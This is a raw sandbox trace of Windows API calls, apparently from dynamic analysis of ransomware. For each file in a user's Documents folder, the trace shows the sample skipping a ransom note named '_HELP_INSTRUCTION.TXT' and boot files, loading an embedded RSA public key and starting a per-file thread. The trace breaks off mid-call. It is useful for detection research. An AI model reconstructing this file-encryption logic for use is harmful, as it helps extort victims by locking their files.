[0035.541] Sleep (dwMilliseconds=0x96) [0035.720] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.720] lstrcmpW (lpString1="5MzXbIREhTTTaeobss.pptx", lpString2="..") returned 1 [0035.720] lstrcmpW (lpString1="5MzXbIREhTTTaeobss.pptx", lpString2=".") returned 1 [0035.720] StrStrW (lpFirst="5MzXbIREhTTTaeobss.pptx", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.720] StrStrW (lpFirst="5MzXbIREhTTTaeobss.pptx", lpSrch="ntldr") returned 0x0 [0035.720] StrStrW (lpFirst="5MzXbIREhTTTaeobss.pptx", lpSrch="NTLDR") returned 0x0 [0035.720] StrStrW (lpFirst="5MzXbIREhTTTaeobss.pptx", lpSrch="NTDETECT.COM") returned 0x0 [0035.720] StrStrW (lpFirst="5MzXbIREhTTTaeobss.pptx", lpSrch="ntdetect.com") returned 0x0 [0035.720] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0035.720] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0035.720] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0035.720] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0035.720] lstrcpyW (in: lpString1=0x17cf1c, lpString2="5MzXbIREhTTTaeobss.pptx" | out: lpString1="5MzXbIREhTTTaeobss.pptx") returned="5MzXbIREhTTTaeobss.pptx" [0035.720] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0035.720] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x428 [0035.721] Sleep (dwMilliseconds=0x96) [0035.876] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.876] lstrcmpW (lpString1="8HoT4SPBYbm.xlsx", lpString2="..") returned 1 [0035.876] lstrcmpW (lpString1="8HoT4SPBYbm.xlsx", lpString2=".") returned 1 [0035.876] StrStrW (lpFirst="8HoT4SPBYbm.xlsx", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.876] StrStrW (lpFirst="8HoT4SPBYbm.xlsx", lpSrch="ntldr") returned 0x0 [0035.876] StrStrW (lpFirst="8HoT4SPBYbm.xlsx", lpSrch="NTLDR") returned 0x0 [0035.876] StrStrW (lpFirst="8HoT4SPBYbm.xlsx", lpSrch="NTDETECT.COM") returned 0x0 [0035.876] StrStrW (lpFirst="8HoT4SPBYbm.xlsx", lpSrch="ntdetect.com") returned 0x0 [0035.876] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0035.876] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0035.876] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0035.876] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0035.876] lstrcpyW (in: lpString1=0x17cf1c, lpString2="8HoT4SPBYbm.xlsx" | out: lpString1="8HoT4SPBYbm.xlsx") returned="8HoT4SPBYbm.xlsx" [0035.876] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0035.876] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x430 [0035.877] Sleep (dwMilliseconds=0x96) [0036.032] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0036.032] lstrcmpW (lpString1="8njS1by2_oecbNC P4zy.pptx", lpString2="..") returned 1 [0036.032] lstrcmpW (lpString1="8njS1by2_oecbNC P4zy.pptx", lpString2=".") returned 1 [0036.032] StrStrW (lpFirst="8njS1by2_oecbNC P4zy.pptx", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0036.032] StrStrW (lpFirst="8njS1by2_oecbNC P4zy.pptx", lpSrch="ntldr") returned 0x0 [0036.032] StrStrW (lpFirst="8njS1by2_oecbNC P4zy.pptx", lpSrch="NTLDR") returned 0x0 [0036.032] StrStrW (lpFirst="8njS1by2_oecbNC P4zy.pptx", lpSrch="NTDETECT.COM") returned 0x0 [0036.032] StrStrW (lpFirst="8njS1by2_oecbNC P4zy.pptx", lpSrch="ntdetect.com") returned 0x0 [0036.032] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0036.033] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0036.033] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0036.033] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0036.033] lstrcpyW (in: lpString1=0x17cf1c, lpString2="8njS1by2_oecbNC P4zy.pptx" | out: lpString1="8njS1by2_oecbNC P4zy.pptx") returned="8njS1by2_oecbNC P4zy.pptx" [0036.033] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0036.033] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x42c [0036.033] Sleep (dwMilliseconds=0x96) [0036.188] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0036.188] lstrcmpW (lpString1="9sRvP5V9AccV.ods", lpString2="..") returned 1 [0036.188] lstrcmpW (lpString1="9sRvP5V9AccV.ods", lpString2=".") returned 1 [0036.188] StrStrW (lpFirst="9sRvP5V9AccV.ods", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0036.188] StrStrW (lpFirst="9sRvP5V9AccV.ods", lpSrch="ntldr") returned 0x0 [0036.188] StrStrW (lpFirst="9sRvP5V9AccV.ods", lpSrch="NTLDR") returned 0x0 [0036.188] StrStrW (lpFirst="9sRvP5V9AccV.ods", lpSrch="NTDETECT.COM") returned 0x0 [0036.188] StrStrW (lpFirst="9sRvP5V9AccV.ods", lpSrch="ntdetect.com") returned 0x0 [0036.188] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0036.188] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0036.188] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0036.188] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0036.189] lstrcpyW (in: lpString1=0x17cf1c, lpString2="9sRvP5V9AccV.ods" | out: lpString1="9sRvP5V9AccV.ods") returned="9sRvP5V9AccV.ods" [0036.189] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0036.189] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x434 [0036.189] Sleep (dwMilliseconds=0x96) [0036.344] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0036.344] lstrcmpW (lpString1="ASEJIISwQeKimcHMn.xlsx", lpString2="..") returned 1 [0036.344] lstrcmpW (lpString1="ASEJIISwQeKimcHMn.xlsx", lpString2=".") returned 1 [0036.344] StrStrW (lpFirst="ASEJIISwQeKimcHMn.xlsx", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0036.344] StrStrW (lpFirst="ASEJIISwQeKimcHMn.xlsx", lpSrch="ntldr") returned 0x0 [0036.344] StrStrW (lpFirst="ASEJIISwQeKimcHMn.xlsx", lpSrch="NTLDR") returned 0x0 [0036.344] StrStrW (lpFirst="ASEJIISwQeKimcHMn.xlsx", lpSrch="NTDETECT.COM") returned 0x0 [0036.344] StrStrW (lpFirst="ASEJIISwQeKimcHMn.xlsx", lpSrch="ntdetect.com") returned 0x0 [0036.344] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0036.345] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0036.345] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0036.345] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0036.345] lstrcpyW (in: lpString1=0x17cf1c, lpString2="ASEJIISwQeKimcHMn.xlsx" | out: lpString1="ASEJIISwQeKimcHMn.xlsx") returned="ASEJIISwQeKimcHMn.xlsx" [0036.345] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0036.345] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x438 [0036.345] Sleep (dwMilliseconds=0x96) [0036.500] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0036.500] lstrcmpW (lpString1="B92naCEgJ.docx", lpString2="..") returned 1 [0036.500] lstrcmpW (lpString1="B92naCEgJ.docx", lpString2=".") returned 1 [0036.500] StrStrW (lpFirst="B92naCEgJ.docx", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0036.500] StrStrW (lpFirst="B92naCEgJ.docx", lpSrch="ntldr") returned 0x0 [0036.500] StrStrW (lpFirst="B92naCEgJ.docx", lpSrch="NTLDR") returned 0x0 [0036.500] StrStrW (lpFirst="B92naCEgJ.docx", lpSrch="NTDETECT.COM") returned 0x0 [0036.500] StrStrW (lpFirst="B92naCEgJ.docx", lpSrch="ntdetect.com") returned 0x0 [0036.500] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0036.500] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0036.500] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0036.500] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0036.500] lstrcpyW (in: lpString1=0x17cf1c, lpString2="B92naCEgJ.docx" | out: lpString1="B92naCEgJ.docx") returned="B92naCEgJ.docx" [0036.500] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0036.500] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x43c [0036.501] Sleep (dwMilliseconds=0x96) [0036.665] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0036.665] lstrcmpW (lpString1="de6NX.xlsx", lpString2="..") returned 1 [0036.665] lstrcmpW (lpString1="de6NX.xlsx", lpString2=".") returned 1 [0036.665] StrStrW (lpFirst="de6NX.xlsx", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0036.665] StrStrW (lpFirst="de6NX.xlsx", lpSrch="ntldr") returned 0x0 [0036.665] StrStrW (lpFirst="de6NX.xlsx", lpSrch="NTLDR") returned 0x0 [0036.665] StrStrW (lpFirst="de6NX.xlsx", lpSrch="NTDETECT.COM") returned 0x0 [0036.665] StrStrW (lpFirst="de6NX.xlsx", lpSrch="ntdetect.com") returned 0x0 [0036.665] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0036.665] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0036.665] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0036.665] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0036.665] lstrcpyW (in: lpString1=0x17cf1c, lpString2="de6NX.xlsx" | out: lpString1="de6NX.xlsx") returned="de6NX.xlsx" [0036.665] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0036.665] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x44c [0036.666] Sleep (dwMilliseconds=0x96) [0036.843] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0036.844] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0036.844] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0036.844] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0036.844] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0036.844] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0036.844] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0036.844] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0036.844] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0036.844] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0036.844] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0036.844] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0036.844] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0036.844] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0036.844] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x440 [0036.844] Sleep (dwMilliseconds=0x96) [0037.067] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0037.067] lstrcmpW (lpString1="dKWKVTxHxijfZD_dSm_.xlsx", lpString2="..") returned 1 [0037.067] lstrcmpW (lpString1="dKWKVTxHxijfZD_dSm_.xlsx", lpString2=".") returned 1 [0037.067] StrStrW (lpFirst="dKWKVTxHxijfZD_dSm_.xlsx", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0037.067] StrStrW (lpFirst="dKWKVTxHxijfZD_dSm_.xlsx", lpSrch="ntldr") returned 0x0 [0037.067] StrStrW (lpFirst="dKWKVTxHxijfZD_dSm_.xlsx", lpSrch="NTLDR") returned 0x0 [0037.067] StrStrW 